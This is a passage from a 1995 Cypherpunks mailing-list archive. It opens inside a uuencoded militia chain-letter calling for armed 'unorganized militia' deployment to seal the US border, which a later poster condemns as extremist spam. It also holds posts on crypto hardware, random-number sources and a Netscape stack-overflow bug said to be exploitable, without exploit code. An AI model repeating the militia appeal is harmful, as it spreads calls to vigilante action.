M<R`@9&5F:6YE9`T*("`@("`@("`@("`@("`@("`@:6X@=&AE(&QA=R!A<R!F
M;VQL;W=S#0H-"B`@("`@("`@("`@("`@("`@("`@("!4:&4@0V%L:69O<FYI
M82!-:6QI=&%R>2!A;F0@5F5T97)A;G,@0V]D92!396-T:6]N<R`Q,C`M,3(R
M(')E860@87,-"B`@("`@("`@("`@("`@("`@("`@("!F;VQL;W=S#0H-"B`@
M("`@("`@("`@("`@("`@("`@("`B5&AE(&UI;&ET:6$@;V8@=&AE(%-T871E
M('-H86QL(&-O;G-I<W0@;V8@=&AE($YA=&EO;F%L("!'=6%R9"P@(%-T871E
M#0H@("`@("`@("`@("`@("`@("`@("`@36EL:71A<GD@4F5S97)V92!A;F0@
M=&AE($YA=F%L($UI;&ET:6$@+2T@=VAI8V@@8V]N<W1I='5T92!T:&4@(&%C
M=&EV90T*("`@("`@("`@("`@("`@("`@("`@(&UI;&ET:6$@+2T@86YD('1H
M92!53D]21T%.25I%1"!-24Q)5$E!+B(-"@T*("`@("`@("`@("`@("`@("`@
M("`@(")4:&4@54Y/4D=!3DE:140@34E,251)02!C;VYS:7-T<R!O9B!!3$P@
M<&5R<V]N<R!L:6%B;&4@=&\@<V5R=FEC92!I;@T*("`@("`@("`@("`@("`@
M("`@("`@('1H92!M:6QI=&EA(&)U="!.3U0@($U%34)%4E,@(&]F("!T:&4@
M($YA=&EO;F%L("!'=6%R9"`@;W(@('1H92`@3F%V86P-"B`@("`@("`@("`@
M("`@("`@("`@("!-:6QI=&EA+B(-"@T*("`@("`@("`@("`@("`@("`@("`@
M(")4:&4@;6EL:71I82!O9B!T:&4@4W1A=&4@8V]N<VES=',@;V8@04Q,("!A
M8FQE+6)O9&EE9"`@;6%L92`@8VET:7IE;G,-"B`@("`@("`@("`@("`@("`@
M("`@("!A;F0@86QL(&]T:&5R(&%B;&4M8F]D:65D(&UA;&5S('=H;R!H879E
M(&1E8VQA<F5D('1H96ER(&EN=&5N=&EO;B!T;PT*("`@("`@("`@("`@("`@
M("`@("`@(&)E8V]M92!C:71I>F5N<R!O9B!T:&4@56YI=&5D(%-T871E<R!W
M:&\@87)E(&)E='=E96X@=&AE(&%G97,@;V8@,3@-"B`@("`@("`@("`@("`@
M("`@("`@("!A;F0@-#4L(&%N9"!W:&\@87)E(')E<VED96YT<R!O9B!T:&4@
M4W1A=&4@86YD(&]F('-U8V@@;W1H97(@<&5R<V]N<PT*("`@("`@("`@("`@
M("`@("`@("`@(&%S(&UA>2!U<&]N('1H96ER(&]W;B!A<'!L:6-A=&EO;B!B
M92!E;FQI<W1E9"!O<B!C;VUM:7-S:6]N960@=&AE<F5I;@T*("`@("`@("`@
M("`@("`@("`@("`@('!U<G-U86YT('1O('1H92!P<F]V:7-I;VYS(&]F('1H
M:7,@9&EV:7-I;VXL('-U8FIE8W0L(&AO=V5V97(L('1O('-U8V@-"B`@("`@
M("`@("`@("`@("`@("`@("!E>&5M<'1I;VYS(&%S(&YO=R!E>&ES="!O<B!M
M87D@8F4@:&5R96%F=&5R(&-R96%T960@8GD@=&AE(&QA=W,@;V8@=&AE#0H@
M("`@("`@("`@("`@("`@("`@("`@56YI=&5D(%-T871E<R!O<B!O9B!T:&ES
M(%-T871E+B(-"@T*("`@("`@("`@("`@("`@("`@06YO=&AE<B!Q=65S=&EO
M;B!)(&%M('-U<F4@=VEL;"!C;VUE('5P(&ES('1H:7,-"@T*("`@("`@("`@
M("`@("`@("`@(E=H870@:7,@=&AE('-I9VYI9FEC86YC92!O9B!T:&4@9&%T
M92!&96(@,#$L(#$Y.38_(@T*#0H@("`@("`@("`@("`@("`@("!4:&5R92!I
M<R!.3R!S:6=N:69I8V%N8V4@9F]R('1H:7,@9&%T92X@(%1H:7,@9&%T92`@
M<F5F;&5C=',@(&YO=&AI;F<@(&UO<F4-"B`@("`@("`@("`@("`@("`@('1H
M86X@82!P;VEN="!I;B!T:6UE+"!I;B!T:&4@;F5A<B!F=71U<F4L('=H:6-H
M(&%L;&]W<R!C=7(@9F5D97)A;`T*("`@("`@("`@("`@("`@("`@9V]V97)N
M;65N="!A;F0@=&AE('-T871E($=O=F5R;F]R<R!T:6UE('1O(&%S<V5S<R!T
M:&5I<B!P;W-I=&EO;B!O;B!)3$Q%1T%,#0H@("`@("`@("`@("`@("`@("!)
M34U)1U)!5$E/3B!A;F0@24Q,14=!3"!44D%&1DE#2TE.1R!O9B!$4E5'4RP@
M86YD('1H96ER(&EN=&5N9&5D(&-O=7)S92!O9@T*("`@("`@("`@("`@("`@
M("`@86-T:6]N(&%N9"!T:&4@;&]G:7-T:6-S(')E<75I<F5D('1O(&%C:&EE
M=F4@=&AE(&1E9F5N<V4@;W5T;&EN960@86)O=F4N#0H-"B`@("`@("`@("`@
M("`@("`@(%1H:7,@=&EM92!P97)I;V0@:7,@<F]U9VAL>2!F:79E("!M;VYT
M:',N("!)9B`@8W5R("!G;W9E<FYM96YT)W,@('!O<VET:6]N#0H@("`@("`@
M("`@("`@("`@("!C86YN;W0@8F4@9F]R;75L871E9"!A;F0@=&AE:7(@9&5F
M96YS:79E(')E<W!O;G-E(&%C:&EE=F5D(&EN(&9I=F4@;6]N=&AS+`T*("`@
M("`@("`@("`@("`@("`@=&AE;B!I="!C86XG="!B92!D;VYE(&EN(&9I=F4@
M>65A<G,N#0H-"B`@("`@("`@("`@("`@("`@(%-O('=H97)E(&1O('=E('1H
M92!P96]P;&4@9')A=R!T:&4@;&EN93\@5V4@9')A=R!I="!A="!&96(N(#`Q
M+"`Q.3DV+@T*#0H@("`@("`@("`@("`@("`@("!792!A<F4@87-K:6YG('1H
M92!53D]21T%.25I%1"!-24Q)5$E!('1O(&)E(&%T($1%1D-/3B!L979E;"`R
M(&)Y('1H:7,@9&%T90T*("`@("`@("`@("`@("`@("`@*$9E8BX@,#$L(#$Y
M.38I+B`@1F]R('1H;W-E(&]F('EO=2!W:&\@9&\@;F]T('5N9&5R<W1A;F0@
M=VAA="!T:&ES(&UE86YS+"!)#0H@("`@("`@("`@("`@("`@("!W:6QL(&=I
M=F4@>6]U(&$@=F5R>2!S:6UP;&EF:65D(&5X<&QA;F%T:6]N<PT*#0H,("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@("`@("`@
M("`@("`@.2\R.2\Y-2`@,38Z,#DZ-#@@(%!A9V4@,2`Q(&]F(#$R#0I.051)
M3TY!3"!!3$Q)04Y#12!/1B!#2%))4U1)04X@34E,251)00T*#0H-"@T*#0H-
M"@T*#0H@("`@("`@("`@("`@("`@1&5F96YS92!#;VYD:71I;VX@3&5V96P@
M,B!M96%N<R`G<F5A9'D@9F]R(&1E<&QO>6UE;G0G+B`@270@;65A;G,@=&AA
M="!E86-H#0H@("`@("`@("`@("`@("`@:6YD:79I9'5A;"!M:6QI=&EA(&UE
M;6)E<B!W:6QL(&)E(&)O=&@@<&AY<VEC86QL>2!A;F0@<W!I<FET=6%L;'D@
M<')E<&%R960-"B`@("`@("`@("`@("`@("!T;R!U;F1E<G1A:V4@=&AE:7(@
M9'5T:65S(&%S(&UA>2!B92!R97%U:7)E9"!B>2!T:&4@0V]M;6%N9&5R(&EN
M($-H:65F(&]F#0H@("`@("`@("`@("`@("`@=&AE(%53+"!T:&4@1V]V97)N
M;W)S(&]F('1H92!S=&%T92!297!U8FQI8R!O9B!#86QI9F]R;FEA(&%N9"!A
M;&P@;W1H97(-"B`@("`@("`@("`@("`@("!S=&%T92!R97!U8FQI8W,L('1H
M92!#;W5N='D@4VAE<FEF<G,[(&]R('1H92!096]P;&4[('1O(&1E9F5N9"!T
M:&4-"B`@("`@("`@("`@("`@("!3;W9E<F5I9VX@0F]R9&5R(&]F('1H97-E
M(%5N:71E9"!3=&%T97,N#0H-"B`@("`@("`@("`@("`@("!!;'1H;W5G:"!T
M:&4@0V%L:69O<FYI82!-:6QI=&EA(&UA>2!B92!P<F5P87)E9"!T;R!A8W0@
M:6UM961I871E;'D@=&AI<PT*("`@("`@("`@("`@("`@('!E<FEO9"!O9B!T
M:6UE('=A<R!F;W5N9"`H:6X@861D:71I;VX@=&\@=&AE(&%B;W9E(')E87-O
M;BD@=&\@8F4@;F5C97-S87)Y#0H@("`@("`@("`@("`@("`@9F]R('1H92!O
M=&AE<B!S=&%T92!297!U8FQI8W,@86QO;F<@=&AE(&)O<F1E<B!T;R!P<F5P
M87)E('1H96ER(&UE;6)E<G,@87,-"B`@("`@("`@("`@("`@("!M87D@8F4@
M<F5Q=6ER960N#0H-"B`@("`@("`@("`@("`@("!);B!C;VYJ=6YC=&EO;B!W
M:71H('-H=71T:6YG('1H92!B;W)D97(@=&\@04Q,("))3$Q%1T%,($5.5%)9
M(BP@;W1H97(-"B`@("`@("`@("`@("`@("!M:6QI=&EA('5N:71S('=O<FMI
M;F<@=VET:"!T:&4@87!P<F]P<FEA=&4@;&%W(&5N9F]R8V5M96YT(&%G96YC
M:65S('=I;&P-"B`@("`@("`@("`@("`@("!I9&5N=&EF>2!A;F0@;6]N:71O
M<B!!3$P@86ER8W)A9G0@;&%N9&EN9R!F:65L9',@=VET:&EN(&%N(&%R8FET
M<F%R>2!R86YG90T*("`@("`@("`@("`@("`@(&]F('1H92!B;W)D97(N#0H-
M"B`@("`@("`@("`@("`@("!-;VYI=&]R:6YG(&]F('1H97-E(&9I96QD<R!W
M:6QL(&)E('-T<FEC=&QY(&QI;6ET960@=&\@;V)S97)V871I;VX@;V8-"B`@
M("`@("`@("`@("`@("!A8W1I=FET>2X@($%L;"!S=7-P96-T960@:6QL96=A
M;"!A8W1I=FET>2!W:6QL(&)E(')E<&]R=&5D(&1I<F5C=&QY('1O(&QA=PT*
M("`@("`@("`@("`@("`@(&5N9F]R8V5M96YT+"!A;F0@=&AE>2!W:6QL('1A
M:V4@=&AE(&QE9V%L(&%C=&EO;G,@<F5Q=6ER960N#0H-"B`@("`@("`@("`@
M("`@("!!<'!R96AE;G-I;VX@;V8@86YY('!E<G-O;B!O<B!I=&5M($E,3$5'
M04Q,62!#4D]34TE.1R!T:&4@8F]R9&5R)V]N(&QA;F0G#0H@("`@("`@("`@
M("`@("`@=VEL;"!B92!A8V-O;7!L:7-H960@8GD@=&AE(&UI;&ET:6$@=6YI
M=',@9&5P;&]Y960@86QO;F<@=&AE('!H>7-I8V%L#0H@("`@("`@("`@("`@
M("`@8F]R9&5R+B`@06YY(&]T:&5R(&%P<')E:&5N<VEO;B!W:6QL(&)E(&%C
M8V]M<&QI<VAE9"!B>2!A<'!R;W!R:6%T92!L87<-"B`@("`@("`@("`@("`@
M("!E;F9O<F-E;65N="!A9V5N=',N#0H-"B`@("`@("`@("`@("`@("!792!W
M86YT('EO=2!T;R!F=6QL>2!U;F1E<G-T86YD.B!W:&5N('=E(&%R92!D97!L
M;WEE9"P@=&AE<F4@=VEL;"!B90T*("`@("`@("`@("`@("`@(&YO=&AI;F<@
M86YD(&YO(&]N92!T:&%T(&-R;W-S97,@=&AA="!B;W)D97(@15A#15!4(&EN
M(&$@3$%71E5,($U!3DY%4DD-"B`@("`@("`@("`@("`@("!.;W1H:6YG(&QA
M<F=E<B!T:&%N(&$@9V]P:&5R('=I;&P@;6%K92!I=',@=V%Y('!A<W1I#0H-
M"B`@("`@("`@("`@("`@("!!;F]T:&5R('%U97-T:6]N('1H870@=VEL;"!B
M92!R86ES960@:7,@=&AI<PT*#0H@("`@("`@("`@("`@("`@(D%R96XG="!Y
M;W4@9V]I;F<@=&\@9V5T(&$@;&]T(&]F(&%P<&]S:71I;VX@=&\@=&AI<R!P
M;&%N(C\-"@T*("`@("`@("`@("`@("`@(%=E(&9E;'0@=&AA="!T;R!B92!I
M;G1E<F5S=&EN9R!Q=65S=&EO;BX@(%=E(&AA=F4@8F5E;B!I;B!C;VYT86-T
M('=I=&@-"B`@("`@("`@("`@("`@("!C:71I>F5N<R!A;&P@86-R;W-S('1H
M92!C;W5N=')Y("TM(%5N;W)G86YI>F5D($UI;&ET:6$@;&5A9&5R<RP@4V5N
M871O<G,-"B`@("`@("`@("`@("`@("!A;F0@0V]N9W)E<W-M96XL($QA=R!%
M;F9O<F-E;65N="!P97)S;VYN96PL(&%N9"!A;GD@;G5M8F5R(&]F(&]T:&5R
M('!E;W!L92X-"@T*("`@("`@("`@("`@("`@(%1H92!S:6YG;&4@9W)E871E
M<W0@;V)S=&%C;&4@=&\@=&AE('!L86X@=V4@:&%V92!E;F-O=6YT97)E9"!I
M<RXN+B!C=7(-"B`@("`@("`@("`@("`@("!E;7!L;WEE97,L(&-U<B!F961E
M<F%L(&=O=F5R;FUE;G0N#0H-"B`@("`@("`@("`@("`@("!);B!T:&4@8F5G
M:6YN:6YG('1H:7,@87!P96%R960@<F%T:&5R(&ER;VYI8RX@(%EO=2!W;W5L
M9"!H879E('1H;W5G:'0@=&AE#0H@("`@("`@("`@("`@("`@8FEG9V5S="!O
M8G-T86-L92!W;W5L9"!H879E(&)E96X@=&AE(&=U>7,@<G5N;FEN9R!T:&4@
M9')U9W,N#0H-"B`@("`@("`@("`@("`@("!"=70@87,@=&AI<R!P;&%N(&)E
M9V%N('1O(&)E(&QO;VME9"!I;G1O('=I=&@@;6]R92!T:&%N(&$@<&%S<VEN
M9R!F86YC>2P@:70-"B`@("`@("`@("`@("`@("!B96-A;64@8VQE87(@=&AA
M="!T:&5R92!A<F4@=&AO<V4@:6X@:&EG:"!P;W-I=&EO;G,@=VAO(&1O(&YO
M="!W86YT('1H:7,-"B`@("`@("`@("`@("`@("!P<F]B;&5M(')E<V]L=F5D
M(0T*#0H@("`@("`@("`@("`@("`@5V4@9F]U;F0@=&AA="!H87)D('1O(&)E
M;&EE=F4@+2T@:6YI=&EA;&QY+B`@0G5T+"!Y;W4@9F]L:W,@=VEL;"!H879E
M(&%N#0H@("`@("`@("`@("`@("`@;W!P;W)T=6YI='D@=&\@9FEN9"!T:&ES
M(&9A8W0@;W5T(&9O<B!Y;W5R<V5L=F5S+B`@66]U('=I;&P@:&%V92!T:&4@
M8VAA;F-E#0H@("`@("`@("`@("`@("`@=&\@<V5E('1H;W-E('!E;W!L92!C
M;VUE('1O('1H92!S=7)F86-E+@T*#0H@("`@("`@("`@("`@("`@5V4@:&%V
M92!A($-O;G-T:71U=&EO;B!H97)E+B`@5V4@:&%V92!L87=S('1H870@<')O
M=&5C="!C=7(@<FEG:'0@=&\@9&5F96YD#0H-"@P@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M1G)O;3H@1&5A;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@.2\R.2\Y-2`@,38Z,3`Z,C8@(%!A9V4@,3(@;V8@,3(-"DY!5$E/3D%,
M($%,3$E!3D-%($]&($-(4DE35$E!3B!-24Q)5$E!#0H-"@T*#0H-"@T*#0H-
M"B`@("`@("`@("`@("`@("`@(&]U<B!F86UI;&EE<RP@:&]M97,@86YD(&]U
M<B!C;W5N=')Y+@T*#0H@("`@("`@("`@("`@("`@("!"=70L(&%S('1H92!D
M96%D;&EN92!D<F%W<R!N96%R+"!Y;W4@=VEL;"!S964@8V5R=&%I;B!P96]P
M;&4@<W1I8VL@=&AE:7(-"B`@("`@("`@("`@("`@("`@(&AE861S('5P(&QO
M;F<@96YO=6=H(&9O<B!Y;W4@=&\@:61E;G1I9GD@=&AE;2X@(%1H97D@=VEL
M;"!O<'!O<V4@=&AI<R!P;&%N#0H@("`@("`@("`@("`@("`@("!W:71H(&$@
M9F5R=F]R(&)E>6]N9"!Y;W5R('=I;&1E<W0@9')E86US+@T*#0H@("`@("`@
M("`@("`@("`@("`H9&ER96-T('%U97-T:6]N<R!O9B!T:&4@<')E<W,@;F]T
M(')E<')I;G1E9"!H97)E*0T*("`@("`@("`@("`@("`@("`@("`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+@T*("`@("`@("`@("`@("`@("`@0$%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!00T*("`@
6("`@("`@("`@("`@("`@04%P#0H-"E-3
 
end
//END BINARY MAIL SEGMENT:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 30 Sep 95 10:05:25 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Press release
Message-ID: <199509301705.KAA24620@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:26 PM 9/30/95 +1000, Jiri Baum wrote:
>All that is needed then is someone with a fax machine to volunteer
>to receive the fax, type it in and summarise the response afterwards
>(noting points on which there was disagreement, and who disagreed
>in what way).

Let the dim bulbs subscribe to the list themselves.

If they are not capable of that, they will not make any
intelligent reports on it anyway.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 30 Sep 95 10:43:08 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d01ac933d63d4d3@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Simon--

There is a lot more to cryptography hardware than just making
stuff go fast. Any kind of co-processor array could handle the
job -- doesn't have to be DSPs. For unsigned integer math, the
486 DX4/100 is a perfectly decent chip, and prices are plumetting.
If all you want is to make RSA go fast, you can rack up as
many of these as you want, and do your work at Ethernet speeds
(which should be more than fast enough for the forseeable future.)
Also, you get to use your old familiar (and inexpensive) programming
tools to write your code.

It also turns out that when you're actually using cryptography to do
valuable stuff, a lot of other concerns are just as
important as speed -- in particular, physical security over the
private keys. Most server-oriented cryptography add-ins are highly
tamper-resistant units that can only be re-keyed when some sort
of dongle is attached. Said dongle can be kept much more securely
than a whole computer. Although other threats still remain, this
substantially reduces the threat of key compromise. Incidentally,
good hardware of this sort uses ASICs that give substantially more
bang for the buck than the DSP solutions you're suggesting.

Certainly messing around with DSPs is fun -- I've done it and
enjoyed it -- but I don't think they will ever be significant as
cryptographic co-processors.

>That's another question. A DSP chip can also be used for crypto - yet
>sound cards and nexts aren't ITARed, and aren't really considered
>dual-use. A Modular exponentiator isn't a crypto device  (hey -
>it's a bignum accelerator for Mathematica). Now, if I had a pipelined
>WSI chip capable of delivering one result per cycle, I could think of
>some useful applications, but ...
>
>Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 30 Sep 95 12:01:28 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <199509301855.LAA20507@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Except PGP skill doesn't equal PR skill, not to mention that there
> might be a geographical, time-zone or language barrier.
> 
> Sometimes having a separate PR person is useful, even if it does
> tend to lead to the moronic statements salesdroids are infamous for.
> With care, this problem can be minimized.

	In which case the person in question can hire their own PR
person. If Community ConneXion had the resources, we would hire a PR
person, because I would rather spend my time writing code and
implementing anonymous systems than writing press releases and talking
to reporters.

> 
> Only problem is, does anyone know of any other way to get our
> ideas to be accepted by Joe Sixpack?

	I don't expect The Mythical Joe Sixpack to accept my views.

> What is the essential difference between a jounalist writing an
> article and a volunteer writing a press release?

	The difference between "speaking for" and "speaking about"

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 30 Sep 95 10:46:10 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9161a3050210040cbd@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.950930114853.1433A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

howdy cpunks,

regarding the use of radioactive material for generating random
numbers, lantern mantles are fairly radioactive.  i'd say they would
be able to emit sufficient particles for OTP use, especially if one
builds a device that just constructs the pads all the time (ie, it
just sits there making various pads of X min length and Y max length,
storing them on a hard drive, or RAM if you're that rich).  you just
request a pad from the machine when you need it and encrypt whatever
with it... 

- -pjf
 
patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG2E5E3Qo/lG0AH5AQHBngQAieD6OL+sVGbyqHAuTFlLL7i1gFOQ5TA3
dGOAACMqWZGfHYIKkSZxaNIm1NjvSqjFK/0w/tZCtZedJBtPtxnCXSGRgF8FW8RG
QfxR2V9fnpNRje/w7+uh/1JezN/KGv3kWJ7DR8yyEIKcJK/MyGhdCfHNLjgHRGv4
yuezjkFnD5w=
=R7+/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 30 Sep 95 08:57:58 PDT
To: sameer@c2.org (sameer)
Subject: Re: Ray Cromwell: Another Netscape Bug (and possible security (fwd)
In-Reply-To: <199509290559.WAA24563@infinity.c2.org>
Message-ID: <199509301557.LAA03540@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Forwarded message:
> From owner-bugtraq@crimelab.com  Thu Sep 28 19:58:59 1995
> Approved-By: CHASIN@CRIMELAB.COM
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Approved-By:  Neil Woods <neil@LEGLESS.DEMON.CO.UK>
> Message-ID:  <199509280324.EAA19959@legless.demon.co.uk>
> Date:         Thu, 28 Sep 1995 04:24:06 +0100
> Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
> Sender: Bugtraq List <BUGTRAQ@crimelab.com>
> From: Neil Woods <neil@legless.demon.co.uk>
> Subject:      Re: Ray Cromwell: Another Netscape Bug (and possible security
> X-To:         BUGTRAQ@CRIMELAB.COM
> X-cc:         8lgm@bagpuss.demon.co.uk
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
> In-Reply-To:  <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham"
>               at Sep 25, 95 02:45:26 pm
> 
> >
> > > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > > >executable)
> > >
> > >   I cannot reproduce this bug on the following platforms:
> > >
> > >         Solaris 2.5 beta/Netscape 1.1N
> >
> > I've reproduced it fine under sol2.4 1.1N.  The page
> > I tested from is http://www.aloha.net/~newsham/test.html.
> > Simply click on the long test url and core dump.
> > (You can view source before clicking to see what you
> > are clicking on if you dont trust me :)
> >
> > > Howard Owen hbo@octel.com   Octel Communications Corporation  1024/DC671C31 =
> >
> 
> Ive tried this url, it does indeed core dump.
> 
> Just had a quick look at the core.  From first impressions, it's a global
> overwrite.  Therefore we're not overwriting a flushed stack frame, so a
> syslog(3) style exploit is impossible.
> 
> Global overwrites can be exploited, but due to the scenario we're looking
> at, I'd consider exploit chances to be very low indeed.

   Its not a global overwrite on my system. It is very definately a stack
frame overwrite. Ive already put code ony my stack using a URL
so I know its a stack problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 30 Sep 95 09:00:15 PDT
To: Syed Yusuf <yusuf921@uidaho.edu>
Subject: Re: Electronic junk mail
In-Reply-To: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
Message-ID: <9509301557.AA23377@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 29 Sep 1995 16:54:43 -0700 (PDT)
    From: Syed Yusuf <yusuf921@uidaho.edu>

    I just recieved an electronic junkmail!

    . . .

    Cypher punks to the rescue? my privacy has been violated anyone got any
    ideas besides just putting each individual into my kill file?

Well, it's not a perfect solution and it might not have done anything
in this particular case, however the amount of electronic junk mail
has dropped close to zero osince I added ``Please do not send
electronic junk mail!'' to my signature.

			Rick 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG1o25NR+/jb2ZlNAQE5RwP/fPlJnpSCqV7YoA2vi8DAwW6m7bzNwmG7
ZH5mciCIvlrdL1Ua0ERVsiqmcXDE5lvU7aYigexBzedUX+q8E67St87gKEuXLkNa
tGNdOlDHb+JwUVfyUWXrHTHVkCgK//MIdToEypkLLv5stG0mHwwh2lf/SZgEPisk
YZJs/btH/TU=
=FO6+
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Sep 95 12:44:49 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac92ed4110021004ff54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 PM 9/30/95, zinc wrote:

>regarding the use of radioactive material for generating random
>numbers, lantern mantles are fairly radioactive.  i'd say they would
>be able to emit sufficient particles for OTP use, especially if one
>builds a device that just constructs the pads all the time (ie, it
>just sits there making various pads of X min length and Y max length,
>storing them on a hard drive, or RAM if you're that rich).  you just
>request a pad from the machine when you need it and encrypt whatever
>with it...

Thorianated lantern mantles are only slightly radioactive. The counts per
second is what matters. This will be a function of a lot of things, not the
least of which is the detector area and the fluence of alphas intercepted.

At the risk of repeating myself, there are easier ways of generating
essentially random numbers.

--Tim May

(P.S., as my last word on this for a while. You may have heard that RAM
chips can have bits flipped by the alpha particles emitted by low levels of
uranium and thorium present in packaging materials. And that cosmic rays
can do the same thing, at a lower error rate. Well, I discovered these
effects in 1977 and wrote the original papers on this "soft error" effect.
I'm not making an appeal to authority here, just telling you why I'm
skeptical of all of these proposals to make a radioactive decay-based
random number source. There are much easier ways.)


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 30 Sep 95 12:57:28 PDT
To: cypherpunks@toad.com
Subject: Re: Operation Stop The Aliens
Message-ID: <199509302004.NAA11763@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 AM 9/30/95 -0500, you wrote:
>-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
> Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]
>
>The Attached File Is For Viewing It I In Text Format Please Forward To
>Everyone on the net work. and post to every board " Please.." 
>//BEGIN BINARY MAIL SEGMENT:

What the hell is going on here!  Why am I suddenly seeing spam from every
nazi wannabe on the net?  Some of this crap has been posted to the
Cypherpunks list.  What kind of weird reputation do we have in the outside
world?  I would venture to guess that we have more anti-authoritatians here
than authoritarians.  Are these people that clueless (or stupid) to post
that crap here?  So far, I have been getting neo-nazi spam, Christian Nazi
spam, Libritarian nazi chain letter spam, and (why do I expect vikings to
desend from the ceiling) a whole lot more.  The next thing I expect to see
here is "evil aliens are stealing my luggage" spam.

I expect this bozo will have his account removed pretty quick...

Maybe we need a few national stories about the horrible things that happen
to people who spam mailing lists and newsgroups. ("Suddenly a wrecking crew
showed up at their house and leveled it to the ground.")

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:09:27 PDT
To: www-security@ns2.rutgers.edu
Subject: A new tack on breaking SSL streams and NetScape servers
Message-ID: <9509301909.AA10965@dmsd.com>
